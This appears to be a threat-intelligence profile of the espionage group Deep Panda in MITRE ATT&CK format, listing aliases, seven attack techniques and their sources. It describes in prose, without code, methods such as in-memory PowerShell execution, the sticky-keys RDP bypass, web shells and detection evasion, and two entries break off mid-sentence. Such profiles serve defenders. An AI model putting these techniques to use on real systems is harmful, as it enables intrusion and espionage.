Deep Panda
Associated Group Descriptions |
|
Name | Description |
---|---|
Shell Crew | (Citation: RSA Shell Crew) |
WebMasters | (Citation: RSA Shell Crew) |
KungFu Kittens | (Citation: RSA Shell Crew) |
PinkPanther | (Citation: RSA Shell Crew) |
Black Vine | (Citation: Symantec Black Vine) |
Techniques Used |
||||
Domain | ID | Name | Use | |
---|---|---|---|---|
Enterprise | T1059 | .001 | Command and Scripting Interpreter: PowerShell |
Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.(Citation: Alperovitch 2014) |
Enterprise | T1546 | .008 | Event Triggered Execution: Accessibility Features |
Deep Panda has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.(Citation: RSA Shell Crew) |
Enterprise | T1564 | .003 | Hide Artifacts: Hidden Window |
Deep Panda has used |
Enterprise | T1027 | .005 | Obfuscated Files or Information: Indicator Removal from Tools |
Deep Panda has updated and modified its malware, resulting in different hash values that evade detection.(Citation: Symantec Black Vine) |
Enterprise | T1021 | .002 | Remote Services: SMB/Windows Admin Shares |
Deep Panda uses net.exe to connect to network shares using |
Enterprise | T1505 | .003 | Server Software Component: Web Shell |
Deep Panda uses Web shells on publicly accessible Web servers to access victim networks.(Citation: CrowdStrike Deep Panda Web Shells) |
Enterprise | T1218 | .010 | System Binary Proxy Execution: Regsvr32 |
Deep Panda has used regsvr32.exe to execute a server variant of Derusbi in victim networks.(Citation: RSA Shell Crew) |
References
- Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.
- DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016.
- RYANJ. (2014, February 20). Mo’ Shells Mo’ Problems – Deep Panda Web Shells. Retrieved September 16, 2015.
- RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.
- Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.
- ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.
- Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.
Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.